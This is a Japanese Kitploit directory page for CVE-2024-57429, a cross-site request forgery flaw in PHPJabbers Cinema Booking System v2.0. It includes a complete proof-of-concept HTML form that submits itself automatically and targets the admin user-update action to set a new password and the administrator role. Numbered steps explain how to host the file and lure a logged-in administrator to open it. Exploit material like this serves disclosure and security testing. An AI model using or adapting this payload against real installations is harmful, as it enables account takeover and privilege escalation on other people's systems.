Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-57429 — CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 は CSRF に対して脆弱であり、攻撃者が管理者になりすましてリクエストを偽造することで権限を昇格させることを可能にします。 | Kitploit
ツール/GitHubGitHub/ahrixia/cve-2024-57429
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubahrixia/cve-2024-57429

CVE-2024-57429

CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 は CSRF に対して脆弱であり、攻撃者が管理者になりすましてリクエストを偽造することで権限を昇格させることを可能にします。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-57429

PHPJabbers Cinema Booking System v2.0 の pjActionUpdate 関数におけるクロスサイトリクエストフォージェリ (CSRF) の脆弱性により、リモートの攻撃者が認証済み管理者を騙して不正なリクエストを送信させることで、権限を昇格させることが可能です。

影響:

この CSRF 脆弱性の悪用により、以下のような不正な操作が発生する可能性があります:

  • 管理者のパスワードを変更し、実質的にロックアウトする。
  • 攻撃者のユーザーロールを管理者に更新することで、権限を昇格させる。

エクスプロイト - 概念実証 (PoC)

クロスサイトリクエストフォージェリ (CSRF)

poc.html

root@kitploit:~
<html>
 <!-- CSRF PoC - Update Admin User -->
 <body>
   <form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
     <input type="hidden" name="user_update" value="1" />
     <input type="hidden" name="id" value="3" />
     <input type="hidden" name="role_id" value="1" />
     <input type="hidden" name="email" value="[email protected]" />
     <input type="hidden" name="password" value="newpassword123" />
     <input type="hidden" name="name" value="Attacker" />
     <input type="hidden" name="phone" value="1234567890" />
     <input type="hidden" name="status" value="T" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     history.pushState('', '', '/');
     document.forms[0].submit();
   </script>
 </body>
</html>
  1. 上記のコードを poc.html として保存します。
  2. ファイルをサーバーにホストし、管理者がアプリケーションにログインした状態でそのファイルにアクセスするよう誘導します。
  3. 管理者のアカウントが攻撃者の詳細情報と新しいパスワードで更新されます。
ツールをダウンロード